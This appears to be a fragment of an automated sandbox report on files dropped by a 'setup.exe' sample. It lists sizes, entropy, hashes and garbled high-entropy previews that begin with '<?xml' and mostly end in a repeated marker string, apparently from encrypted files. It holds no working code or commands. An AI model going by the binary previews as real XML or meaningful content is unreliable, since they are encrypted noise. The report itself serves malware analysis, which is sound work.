              Malicious:false
              Preview:<?xml.h=..n..B.....F..A=Bv..h.Jff.r..%.>...L.yo.X...U.|..P.Y@plN.W".(>a&^l..t6.fp...O)S.V1...5...u...".,...............i..}23..AC...i.......VOR.....?[.......\..-{..&...Y.p....."kq"grc...F:Z.N}..8.s4~.!7:.......n\...e.Q..5...$.:.D.......s[LL.Z....$.].....A%.<.lW.........e.k`F..2l.....D{..nv.X.Bb.YI.|.N..,-...#r5....Q.....<.\.......H.YT.../.....R.(.....S...|6NP.........9..C...u..6..._s...6.{.....E.]....C..z.......SI.Pg.6.G&.v...D.....Mm.j..o....v.To.......d..>y...y.+..o...pM5...G...)....&..@.4B.-..7...H..% .e.=....W......Q}..A..Pa.f.(......\..vT...g.}q..!..=2`.n..).....|B~...Tq.e.=....*~W..|....G..4.i..~.TT/x.U..O.._.$1....o...4...]..#.Tm....F.#...x..k...O..70....k.reg....I]3..^.&.....h..$2.U..n..C....~<..G.&Z.<.'..S..L.Ds..[f..._.|%.,8..)eW..X.zTn....\.r....3..5......@..;.s.OZ....6.......^..........2~X..o..K..s..~...C.Ayz...rI......>..6.'Qt(sp..z.....#&.x:eK..........[....c8.d..\4...|:..._.#.q...)Po.1...c.[.....z26G.._{.E}.....7.PcLq
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):916
              Entropy (8bit):7.784923421649568
              Encrypted:false
              SSDEEP:12:Oa8knmclHkOZWBlOdIZIuFeh23Yc7uvd5yltgNmv0z95wlY+r4gK0LzLyiIcIUCu:OaVlkOC9+23YVAtgNT/yYdgryivjbD
              MD5:1DFCE19380A1FA0BD1C77912F9C47D0B
              SHA1:0A0B2DF47CE0E4CE6685A1372303EBFF22C73D77
              SHA-256:7FFB1D88EC04B398C509B9993CC6260D75BB43B98A57E33452169A6BCB82EB27
              SHA-512:38F2C09F9079B4CC588E0FFAEA279E86203DA2A23A7DEE84DC943563EDA87A133D1E9045EADDA2925F670FE8D6347180D4039C336E173D019D3C3D73517DD2D5
              Malicious:false
              Preview:<?xml...F..h..W.O.f.R....:.0&......dd.r.i.$..].7..k......<.....x.8...L....*.6.3.....[.7:.............|7..]..t[......&y..v...k.PHC.....tf=..d..p"....xJ.T.As..X......`L8..y.YJ..p.)...............hKG..o....KY'>..-c..&.ea.p).J...........b..._.?...[r.X.......>...7.cQ.....q.9.N..+........X.....L[...2...Y..J.,jF.=....3.l9.X..~....V....7.w.>.....P.p...Za...`X.[...q{.5.....*0.M..v..........5...[.C.+6f.h.9.{C...qx..2.&/H.....{.+.bv?.../.x{.. ...I........#U..r.q........T..NC.4....1V}-....c.M*l^.S?.\...I...D.x.'H..1..V"...EC...j..b.S@........\....\#.....|...}....@+.....1.sB.c.cdF&..@...g._.3o..~Kh(..@-(...b....g.[...?...#J.....NB.U.s.ew1.H.Ki.,........XQ..*FE..?p~...==K8m.y.........3.$.. w&9#AA..]zy...........].. .vI<...L.~..p..j.WC......E+@.........i!..f..F~..#j9....R...q....36......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):887
              Entropy (8bit):7.7717599941383355
              Encrypted:false
              SSDEEP:24:1ULK/LDOWbG5BSOLxy1vlw9IV+zCl08t9bD:1JOWbABNxyd50zRQ9D
              MD5:01C643C214B3B5E43D597E1DD8C2B7C1
              SHA1:B6213CE5A2F38C34FF92179516B285BBE730B5A1
              SHA-256:8DAD1778686DB4E8AC5B42EF1DE92B253F0EA2BE4004FE011F1DA481F16EE833
              SHA-512:0A8B7434628F556273B75CAEDB22574862D8E06FD3C3D59DD521C33FE93FF41B314B835C6E9F88D3378EFB9DEBB624A2E906C08A73025A117A7ADEB21CB82DE9
              Malicious:false
              Preview:<?xml...eq!%no......P...KK.tP"F...,j2tB.8,...M.),.J.].i!........f...n.wM6<m~(].....w...Qne..i...n.. ....5...!.W......k...>....~|r8U.M.T...oD..C5Ph..!...,...(ilf.6...6R.....it3.ES.SF..r..".!.Q..Us-=t..'..]|c}m.p.I.2.hl....|...Y.........?...U*....(.ur.1.U..>..(;Uq.t...G..{b...r?."...!W....nSOu."..AO...U...:.fj..)..a>.[....G..zg.0.._....d.o}m..~.[U.Qi.Q..b.}..B.Y9..P..7$.$..f..e.p....{...i.. ..t....f.....e.].."...T..{..bFDZ..X:*....K6.. '.Q.......*&.\..!..p(.&..%)....em.{..x.T.!.)..2.(I......1.....W....;...).":\@.c......<..B..R.c.v...y3...|..!....|7...u....i...|..h>{o..g...@..\5;vI..i...T.G..Bp(l.Z......]~.2...K..O..+_.. .#z.L.V3P.!.T|{...NB......l.....3?.Q. f.~....y.....t...k.g...L..R....t..8%.p%.eK.l.xA....=...`.......9-#.O.....8../.._b........|e....}..H`VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):975
              Entropy (8bit):7.7702889634441625
              Encrypted:false
              SSDEEP:24:qdJmmQpjwT0fUG25mbTwo/Xqq+sjPvVfEDFdLkyTCbD:qawT2FcUzvyTQD
              MD5:09F8A2A964A5E58F7DB92EBB8F9AAC76
              SHA1:272FAF9600B76F2550E79471CACB1EC5BCFD7014
              SHA-256:27BF2DBC657AEC85A73A7880F6794D2D209D21BA415DDD985BBF7E1A7DA169F7
              SHA-512:1125C13158260994F68A19A45DE284BA29CF2BEE4AD6A23032F088A178C5E74DD0D9826D29254F493F0E1307EFE88CD85427FFC8EB21A68C7EB3FEF2D4F74610
              Malicious:false
              Preview:<?xml.\pt=....q...1v.~....~;Jr....9.5.3Q.....a^.-r..s..fi.u.d`S.e......Q..$J....T.....DE...U..Nx...yT..@JNf..Y..<=.h.x...1;.......M|.|...|.n.EH......sxr.m]W.A..D..1..|hW.1..>V.1B.t.... \..u..E."..=...(..)....#......lH.cf.NM....y.....@..5.?+..%.-(n..8g..K..)..3m@m....../..tv..(..<;.56a..,<Y..4.....~.C..B...s?In..w.{......y]...B...\..4.Od.dX..G............GIw.X.7.B6|.VB.L.`.`Y.Q.A.D.P'n..M.e....J..\...2....J>.S..L..?......(.....^b...|m?.........n..9.G..f..4..Vc..A;.3..4...X.....*f........|..I8Y@y.g.!.~...."..sv.x[X.......1....bs...`C..P....o..Hq.~..N... .J....F.._.F.L..,o.K..k#...nM1.IzZ....fz.iv..........JA...I.HJ$.x..T.c..n..\..i../......(..3.?O.....lS.+HC.3..!..D..;.v!....xY..v....q...W...R.. .. .*....<.[K.H.isS._`,.....s.. ...F..8.#..+.3Qf.ZV^...q.+^\.z*.WH.....T.5.V.FYT.>.m...,H.._!.fY.O..Y........1.+(.q.$`....$@..K.I....K./....O.:3.3/..[.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.720088251398296
              Encrypted:false
              SSDEEP:12:Q5/IyeaWinDeaxtQX83fohvjItg4GtiPxsm8h0hIwW57+hHzveUnAGfjjPezPU7s:IIh6nDeaxte83foZItXL8h0ywU+lzvej
              MD5:9994639D55A9E1A563726FF1EBDFFE17
              SHA1:737AF57E1568A8F40FA6CE26AC1BF37287A966B9
              SHA-256:C5274DFE3E0E3282D15D2B7BD0BE6B2752FB15D67AC2ECC9A058AD67FD660A9F
              SHA-512:9CFA7FFB672B010E408F44E4C700AC77AC1A9FE2AAB1B98D5C6BD572E7C0600B6932FD2B120DBB1A987905F93178CE324EABCF5E39D9131FEF16D351B61818D6
              Malicious:false
              Preview:<?xml.;.e).A.g...qh).\..`.>...V.....NB..o[.>..$..zR1.J!.n...~\...>am...A.nr[uK..!......!.....Q..".T..$T".:..tF..........q..S.\.#...-..`.:.-.f...X....u.f..........v....H.m@.=.t...p~.G.E.L(..q..]Kv.(..G.N.zQ..8.}N..AP%S....u)..m~o......i.q.N..`......~...........q........F...>..9.,y.`:uB.d.*..wk.....b..l.B....?f.......s?."M.v..<.3.S....F..y......+...V...N.{..t.".-p..#....!.~..@.................F/..k...&Q..........B....hm.1h.....}.....r...S~I..@..W...c..HS$i.g...8...O}.9NhR....oe.G1...cu...j.\.....#..^.a..O.....+)..vJE...[...I^8.....9..m>:Z...r~...Q.%...(.B..J.c....H@..).,z.h...d...M.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1031
              Entropy (8bit):7.785018514859854
              Encrypted:false
              SSDEEP:24:TYhcvgaxkGKKdak3C5IJDLHu4KNhGUlq0L4gbD:8hxax9X3COJnUhGUl9LHD
              MD5:9B42D6F5ADDAEFA410320D7D2DE7F08B
              SHA1:F832E042F038F2C0336AC060F544CEAD7F0DDBE1
              SHA-256:A6EB5BD9FC653763BF82AB30A5FF4FBE045FBD4460DCF16EE55BF2709F6B21AA
              SHA-512:D67A37A2BF1266459F611A54CBB598896AD8F767B2620C887B980AAD7D9C1FBF84E910FEE1033FCE49A74FA3F2AC308BA1BEE8EAF561546D29BF5D779BBA97EF
              Malicious:false
              Preview:<?xml.....i.....u.u..O.+.R..3i...r].CC.~........./8.,.2`w...^lo.q..*.$..j/...S....<Z"bp.iT..sBq...Wg.G....(..Ght>.!J8.<.....r.c|........O.....C..j7..f..-.8....8.]1K4.....l........Z\..'fo?...|..&.%AY4..5U.x>..t*Q./....,.&.2c.....+...%....'..OK....EG..;....(6JA..*..Bt.2.....E...KC.,M.=1....m..c....m.P5....;e.A;.o9..ZrGq;.ui^.G..;\C....h.{0..GEE!&......wB.8w...<.,.Z..(.#...Wu..%....?,.``&.@l1J.hl._.wk..%m... u.....%...}z..*..k.D...6.l..b2?...^.....;.`..K0.%..-.Y.Z..FWE...$....`...C...f..hG...>.&.XR.".......bt.4..1o'.........@...Y*4.2f..l.i.\.;L;<j..EM/J..\K...5.w...K$.9.C........B]M.._..I...@.~..2..zm...;..e.....eP&....(...B3*e.(/........CqH.3,I..C....f.............l..F.....c.....IG.......|F..6+....7.#...l.........%...:jE..UH...HbBe|v.dk|.]Z.bZ)........l..n..T...3A\...a<7G.. JIv?.......yu.J-.U.[.....[....... .....ME.e.l...[._Y.D}&Z....J...d|P7G............q.i=...C.:.z,......V..h..Me.t..;.h....t/.c....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1143
              Entropy (8bit):7.799615883483429
              Encrypted:false
              SSDEEP:24:ZRIJCWBpAXD6gekMHu8SWw/zjHxbMvUosS7x80vMysGTt1+b0C2bD:LIJCWBpMFB8SW8vBFKDvMco1kD
              MD5:945911BC6B7A4DD93EC07CD86B4D0F50
              SHA1:0960993ED59E1319399EBDCB04A2D157B02136AD
              SHA-256:C98AC15C2161065B3821582309A7F3336B0F95BC54DBA95DF1EF32C1F0AC0106
              SHA-512:50E8C9404BE46179FCDE20F261DF3DB1CAFC531D77406A2734F152FDC059B3A25346D850111E11B72BDDCD710AD84F5EC9C6281F5415B861C89954777ECBB4FA
              Malicious:false
              Preview:<?xml.t..Hk.Nd..1G{.$.-..rs..).....8..W..>/.$vp....3...)....`.'.....,.....t.=.l.6[M..=..]...Ny..>..l...-@.k.h.WH[..l.6.^v.qF.pM...I[.x>Orl.D...U......%.[...h.....A........?._'.....g.Qlx...-....R.-.mWY...d.$IO..A.\..:.$AHQ.2.E............k.\.R.FA..t..r...d..W.B=....S...c.gdWf..8,.....RF.<.p........Z..K.(D.+.s|..k.)...&.T...W......z..e.pP....=...F. F.fp......n../p..o.2gS...ZK....<+.........QumkJ....A!@u$...hy...<`...h?.....u]+...L1...I..Q.7).*.U.qx....R...d.J)...N.N..y..z.3.gi.&.g{V]..5J.5..&^NP....f...Xv."...U..- .6.la...Ca.....w...*h.;s..H.w...K....'.../B.a..Y..(.VS...G.m.1s3U*df.....\...H...wJ....,8qy...<?.dT6...SO.;......4..p.h..s ....<q..5.]5..:k.$&.Y..8.l3p.=v........[.d.d...g.s.]....v.T....3.|.<Z..>S.s.Z..L.bl..Kr.x...y.+..~./A.....+_Z...V.......o..C....G..R..,V..@.t..M../.x:......O..r}.MFkg..g.:vt.B.....d..N,.b.I..6I....U.J.8....}g..s...W......L:..}...3.....S2....AE.:.<.. 3r\.X..I....wf.....0.....;q.{...V.]..?..q_g#...7e2...I...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1503
              Entropy (8bit):7.85278451918109
              Encrypted:false
              SSDEEP:24:Ej+ToXEJn3LGzQ8bLOQh0D5+YCJrp3pzlkdIWtmqLbiehxIZMOcOWGEaGYbD:e+Tt3CzQo2D5+YCJrnxeIWRb9vINWnCD
              MD5:3DDD88C76D2FABED56628C867D591339
              SHA1:D9C13A301592E9C3262315719122ADD58A80B614
              SHA-256:73284CDE82C5511D9F7F9DAB822078521512CA7EC96FAB33116B141CC24E86B8
              SHA-512:44919658BD380937334EECF9DB8408EC0F8ED1EBD3123DC3A1149B1CE62F826447D4048221DD0D5FFA7C6F002276628E3E2CF4B54818E01F5223899711DAEA91
              Malicious:false
              Preview:<?xmlak...K..T.i..........j../|Q|.-.}.G8Zhq&..t.Yf......eK......r.i...i9.1...>tC.p..%..\..aF.?l(.<T+...[:..<...|........B.D..C.p.].>...e.r\.......... e.*'(......&.......53......i...+.."R.._.....'...vk.....[.](u.........:F...|d..<.]n.X.R.L.......K..B.. Z....aV.!.{l..UxMI....(Z?|-..D"N....t...M.Y..n9+..i...n.....y...,li.^,....Q..}.g.D.^.S4.f...9....t%.wN.(...0K.m...wj;....[.j.f..wu.O.l.~.2..l..3..].H...5.....I.;ik..@.J.7.H.t/`..P. .G.-A.c..|..3.B.6..I.2NMs.A....vhb:H.9p..:.W0.Z.......#...SL...^..1..&5.>`|......R...1J...q...i.i...>..YA..e...........!.....4...2gt.{.#..V.......H...%.-t5.z./.-.......n.[.[yW(0.:.Gz....3\)..l.~.Y.....kt..5n..4:..*........65........T....u.....xdu..U.F...o.8]..J....{....\...[.l%.R...16k...|I^$Z@..|...sAN...Dq.ap\.V...0..3.....:.....i.{....:..O....pT..7..|.D...h.=..+].SaY.F.....w0(4h.z.bDt7..C}.....Xl,rx.I..0..r.....!.*i.-2.(7.7#.R.......Hxb.......W.M...t.-..B6.'(....GbY...2.X....!.b...".a.st.EA..L.......(.L.....E
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1036
              Entropy (8bit):7.786152287779629
              Encrypted:false
              SSDEEP:24:hpCC8G5GZwd+sSYSr47NX6HoZC1u+MLAeVUaZ7tGbD:375nMBr47sHKC1XMLSaZ+D
              MD5:23A2125A020C3D36D9C1ADB79A9693C5
              SHA1:2956509C19F156753B014612B16074C1C1881398
              SHA-256:8C94B23BB3E09B3EB1C5AA8CDB79450D6AEEA8A5F9A9586D04FBB77494A981C8
              SHA-512:DD15FC7ED575C8C759F4725BE82C2A898DFE1B5FDA3060BF2324B546CBF627E941ECAA40B3160021C71C99C2F95FFE99AC001891F76CB72E22B304944B5C7275
              Malicious:false
              Preview:<?xml.U.Z4...2u.s..., .D.?....T@.6......P.r.......V.<.....63g...6.$..Z...<......H;..Zmx.S..T..@.C...DB.2o].#_.....oDb....p.....~.B.....Bzk..P6.Lk.......>.!..!.......L...i.....i.4.T..o.@9...a...x.ql]....@..$..D=3&tm.....i....].0kA'......v.;*....,.a......I.0....YO.8K.... .1.{.........6..E.0....Kb...V....Y.{`.j++<v.t......f.w..1B._G..3e../(..X..".}..]....$..J..HU...1ekj9P...Q......F..|.8..Z..T...2...m.s6l...{.{...>....[..}Sw...4iM(..a..v..^x..k..<~..X{3,f6...Z{.....O..0..[.^Y....A...S..........[..O....S0.".&..:f..bV:.e.?*.@.Jkx...:...........d^.m..1.Wx03.LzZ.U.....7"......jh..;_.....{.7..yv...\..g.T.........9.Qg.....4Xb..*J._i...Oz.@"...cwR...u.b..g....9+.-.a!~T#-@Nht..;{3......$...8...,.v....73 ....M..1.EF.v.;.D.......m.v-G...Q.8.jq.....P..#V..Zh.._..D.....Vn..\ ....s.. .,.Y...T._../....O..fM.+s...?..c.}.!.._*..'o.4>........TyZ=,..-.T....|VDP..y.,.}....5.b.mbj.WU.R5..%u..%..VX......6.R...*XQ....J.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{3
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):7.776215856330632
              Encrypted:false
              SSDEEP:24:13MzschdJgZzr/HRiy2On+xyOXaMuXbaPQUGqdbD:qgjZzDxiy260XpheqdD
              MD5:2D0BF17778F14D6C33482710ADFE8F7F
              SHA1:8C04E55A8027179FD0C53B2119F826B02FB4AEDF
              SHA-256:C8184C3D301D199D8855A64BA30EBE88D25BC3C116FCD7EEF6A49A8DE4830DA0
              SHA-512:0B2197B08A15E5302B78290EAC3F162E11B9F54C433EC34AE6E9A0B137C261A4A4E0D13A7098FE9526935D71CE7BA569C50AA12CFF7DABE933FC687E7622D0DD
              Malicious:false
              Preview:<?xml[GfdT...l.]....m:..x..lR..}IL..fH..x[u...%...9..8..Ac.b:oOo.'....U....-6.W......m...`]/...w.aK...l.@A.I.K. 'w..>.U...N....~O..|.QWy..0...Fr..w..Bg..}c/..,4)o2X.YR.x.o.#.......TMO2\..:|c.....[...X.%}...+.e...f.a..?.....5.<.Pj..}...~...V6.i.~.#.|..P..rX......i...g<.......,}.3.R.....h.;....).}f."./j..E....mh.k.1......R.!....t.....s9.w......o}.....~ge0..Ox1..v"g.5]=Fsz...'..b.>...;M.R....N.i...3k?.'s.c<.P....L....y..A5....k.O.~.G.....L.)}...9-.y.........j,H.P\\^...^...1:.x.s...........uG.W3P..1..0.<.\,.f......l..:...`..<M.]..8.;..X[...O.`.Y......t.._.a.<?.!6]..\.........(l..RS..v..19......#\C.m.=..."..uv..*.~......Z.e..."i... .....c..'QI...j9.*....!ot].:..#......n.a..8..`.._..1. .....'.......q........."..f.......D....v....4..N~H..KXo....s.....!....m..'[...".F....2M...l..._./.t.t...4..h.F.....C~.q.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):723
              Entropy (8bit):7.689912311833204
              Encrypted:false
              SSDEEP:12:q4SCEOKXrzH08nDT2bMOWdFt8eme9paj8G0mP4ygQ2U81B8Nzq/ybyoZeLnWQv5u:D6rzHFnY4HJ9988YP/yU81Izq+lZeLn4
              MD5:677167AEB8DBDACFCD6D5867E79F461F
              SHA1:F81C08EBB3DD78BD9290DBC5E141A622D49A97FA
              SHA-256:A14C56E89E75DFAD024710EA8625699A4FC8FF2CF9038F560632294E73761869
              SHA-512:1FFB6E38237F849AC14ECED916F4D4D8E4A5D5F460D412C70C52E1F1DE6B67DDD3673A3DF7D457F06C4E6AE9B6FACC7A5EC29A480C6EC91D4A9F6DCFF956ABB6
              Malicious:false
              Preview:<?xml."C:......<U.v.=.'....W<.......Y..}..n..A.v.A%..-.L...&5H.c...<Y....T.UN...#?....r.)i..w..a.oq...:Sz.|]+F.J...h.........,...n7M.....0.[.........Y.........mL1$7......)..#.q..#z_/..L....^.!..5/..H...w...vl.w.v.L.4.....2.^JvR..._.f..........q-.G.......M..8.3...5..YN}....i.........~.7\. ..vD.x[....ZdE....]%.F8.@-VN..]..*.`c..".p.K.$A.McB.yL.....-*.y.e...j..._.z.N..!\Y.P.K..}..d..Cd.u.>...Tf[I.D.K...~6TAcjo..S]..4....J.....;.......|j}...+.+2.Fk!.+P...A...vU.|..(y6M...W.....)=.e...~...sK......Z...S.....M....'7..dr.0...C.......8....o1 ..w..k].. J...'...5....d.x..R. _..(..cH.<.....X1..x.].wO..!.^.I..;S...f1.z.i%. \.)_BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1089
              Entropy (8bit):7.809425472598282
              Encrypted:false
              SSDEEP:24:705amICQlHqCgeq8H2MZq80oXJhdabs5huqUjb2DezOoZbD:Y5azCKKCoYPZtJhkbCtCqDhQD
              MD5:27E82714E90660FBB25254AC9F511821
              SHA1:544D9A26F4558FF3A0BE0E023749231E1320D084
              SHA-256:DEC0146253F50C54CA3CCA9C7870C6F0029FAE5AEE22FE7F5525AC4D95F5FAD6
              SHA-512:1F8E9E92CF1C7143BB1ACC61EA04E4ECC4E97B974EE4B1FC070E153AA901894FFEE907BC4B106299FDC3B0CAE88BD9910E7C8B060EBCF23487E67A592088D6E4
              Malicious:false
              Preview:<?xmlJV...)...?....O..?...W.F'.f.....1!%)...?v.m...|..0. j.b.-..uU.*.^*../.l.y.M.1..m...^.f...m|{Q....f.....i.a...wD.....#..}.g.|y......R..|...X....>>|.:..y..G..'.m.?....X..7.P..+...]C.5t.F......L...y.d0.!..I..........R.XB.B.~..7.gw+gHf?s*.94$-.K(.:.E..n...v.......%..5Uz'..!+f.~W.Q..."[......[.`..U.O.R.n...+t......)..t.u.....B..._.....\.a.Dj.K...?y.......|....S+.5.@C.IO.......jU..d.e@Z.O.E...l..j.-.`).D.....k..J.>..RN.\...TM...i.<R1u$.P../:.X}.d........F...7l.L...&...e....*.2:..k... ........8n?.d~`...-...U.+.....l..a.f.......I.U..RPO....F.`.xA....Z.Q.6.+.^.E..b..T...9.+.VZ1..EU...)... z.wd.......d.y..f.[D.y.x.1.m)..yqF...sY.6......e.u=..<..T1.Jv..RA...k.!c.9..O..........3.uDZ..<..DH..._.F...;....{.Pv.>.I|a..7B..5...G7.4.p(.V....g...~..^...}.d'....Rj.>k..l...;.......|....$...4q..).Jw..[*g.5o4.3...T.e......Z.f.mB.U....{.~...#..f.M.S.|.5.....rA....2$..l...b5g....Pg,....S.... ...}DK...u....%..]....k..-..i..l0....gXO.".r,.......n..0..V@
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1049
              Entropy (8bit):7.809388661646441
              Encrypted:false
              SSDEEP:24:9FMzXTVfItEEu5TG8PElRN2PKY5zfj21eyq4ljSMQiRx/hzWZH3mXbD:9FKX5f7J5TFPElRN3YtchpleMVgH3SD
              MD5:31F99A1688CEDBBC27502866F6B766FA
              SHA1:11974AD6551BC360E47D5DD43D2C5323441FFEC3
              SHA-256:C402ED2CA65D596D0640332FAA0AD4F551229BD00567ABA69F66A7F9956233A0
              SHA-512:BDDE5CEF47F9AA54CE298DE6182D74CCAF134F8D5172260D8BF1E8345673112EB7AE17D4E48AA1F880CC1A2AB351738FDE9E6593DA323E64FE5C4C9A4F065F31
              Malicious:false
              Preview:<?xml........."v..kK.(..>l=C.@..Pjd.c.=.rjiX~W.1])3.....t.....ey..... Z.<.o.uk...2c....69t..`w.:M.U~uR.~/........5x.../.?....x.!t..\W...1...@.....?a....t..(..c...&....xld........h@...r..Y.g.......-0:.gp..{.G.k...l......M......5..A.....\..D=.|....[......R^.#...............Y@...W.V...RL.]..39..%.......R.t.uc........@o.z...]...[.X.>...7....0.x'mn!..b.:..K..G...7B.....(....._l.f(.+...j. "{*....d.^....l..........>...x...r.,xv$.)....!.8Y....z..&.=..;...a.$Q..Ef1...ax.%V .k.8......J:..v.ya.cr...3^....0x......?Cg{G.$....R..d6=.<1Z....D?..........d...2..]x...)Pe.._.J../..7$k.;.v-..d...;.CYY.E..x..c....1.b.T..h.2..9"R#i.:y...H.@C...yU.H....E4..GO...;.DzqCA..R.p.....AW.3.....-I...;&.....$C.-/o...E.KB.Wn.5...3.k..........L..x...{.b.... .&f!...{5...:nB.n.r....)...\el.\,{.......>..h.9.v.uS.v2...........P...a"#.M!..."^...U.p... .,n./......R...?...[.....#......s.\Hp..]U...#.J.L..Q.h,.......M...*.M\B.\.A.......P....Zo......G.V\y...<_.VrBq0iLIRHjQLgVRLsN1WK8yFkTCR
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.752781739934235
              Encrypted:false
              SSDEEP:12:EDTvLk1WF7vAEGadrpp0OrbmT7wr4ugI7fwaaxRL4cecX3YUsMR2cii9a:OWe7vSsp0qq7wcZ9RxR4f2ObD
              MD5:42B8CADC37E61BAE62705F3FDE605E99
              SHA1:52E02215126E555A2DBB616255227334D71E3F6D
              SHA-256:32A40F5AF5E137CC4119EE5CECC02AB76BC3BB53F6569E24B5821E0A9B1D8AA2
              SHA-512:517E69077C1E9324A1DEF9EB6C5D662E69A64B6093FB4B458274439E1C91C0C5CDACE58D4BFDF402C31625C8DE30D1C81CC6941EF75BC4AEE239ED94F3F94C4D
              Malicious:false
              Preview:<?xml.(..n../..f.)....'......vK%|....#.....e...q..............g..h...'[..;..`.......p...3.....X...'.&..:........}..'[.q.h..A.........<x..$...7vk.Mz.%f...X).C.0.....F[...P.e.42..}....C..X...........1RX..z}.P).0.BcK=......x.eQ.:.I.`{*z.d.-.A..T.~..$./........rt....,q...t=vz....K.5{...dI[..Fc._?^v..P........T..=_/...#.\...S.f...Q..%.=5U.,v.`/... [.I....`y..nwh?P..<..P..N...?....Q/.f.........@ . ..<Z.zv....o...w(......9.d..!.=mQ(.....Y.,.s...g...f-...`...#~.....j.JH..S.J&"..j..8s.p...[.5G..fM.N..w *.....!b........k.V.".t.M.;R\.2.....,v._.!.:Z1m.[.srjX...f+.N.Lcr.....X....\.VP...6...*N7......bjV..../l`..=.A[.8g...JT;6.g.....13>".....^.VY.8.v.<.Zp.h6f....*...:iY...T3+.....vje<l1...y3k....A.ckG.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):853
              Entropy (8bit):7.762003585329715
              Encrypted:false
              SSDEEP:12:tEHf5Hq599teFpGxa5upMtcwRF1J0+5WjoZOy/Q1YuqhWYNNJsMR2cii9a:tGI9y40uUdRF1b7rSjqhW0WbD
              MD5:1DE8F03E8A5F439BFE917798590ACF82
              SHA1:B7AA8C11EBC9E1D2020F332723A4010F9FB5958E
              SHA-256:0B08C49D8552B6BE4A791DC4947685C623AA61BB20B3F210E692C7E3F195DB4A
              SHA-512:99CD96C0537017AAC3C14C5F680B48227AEF8DDE01D0AEB5E66CC17298456C103DC201827A5FC4A572C34611CBA4E91A2475A069B9EB4DBFE9711DA2E3781498
              Malicious:false
              Preview:<?xml..z..O.o.3..2m..u..y.Nn..'vH.^.v.h..>M.X[...d.c(.D1@..T7..4....Ag....``...m.B...L...g0."JU.. ..z.z.....,..1s(M.B.-......E....+/Tl.8[.z~b..q.z.......b./v@%.n.[.?..,.s....a...vW.w.....O.>.\...hW....Q...QgK.Y....wO.3.mB.`Qp. ......A.P..4J..Dx8.v.H...^..j.J.zP.X....[.+a/F'..j....w....^...k....Op..N..*...h. M./.....%qE...K.z[.~....9.(..Z?........?....'..\f..e.@...d..&M`*C....Z..M.....7......l.....:L...dm..@..D.{..kU.a.t..!..v.../~....A..... N..N]....I<.`q......[.$pW...M.}.;y......r*..h.&..SE.......W.6...U.E..}.]C...#.9.-...XgV..R^;_..d...../..2.\.........!......*4.ct..*.p........C..w.<.j.X2......\....#.U...l.%.T.......X.Rf$............R.....C..$.ux..E.f|..........P.....;\..].X.%3X...U.Z.J..&p`b...7LE~d.^..q.<z...4vOd.yp%1..vWP.@br.XVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):912
              Entropy (8bit):7.771810548072163
              Encrypted:false
              SSDEEP:24:SOBryxUgRuz14ueVTctha4r3QG/V5EfAT3H5bD:7dyqgRbZShxwfAz5D
              MD5:BA7FFDF6A0787E92312B894B7ECB340B
              SHA1:8F82CB015AF6E221D82A56903FA3FBED5B0E71CA
              SHA-256:A1DF59EBBCD3E24BCCECF7B63AAB7EAC4B6D9AAF8E3740D644C08F190CC98DFE
              SHA-512:DEA953198F8DDA9C4FCE1171CA8E405518E2A287F6AF077E75C5FDA460DC507569675840B03156525161B0DE43581926A056605704F5998C52B37434F4D551E5
              Malicious:false
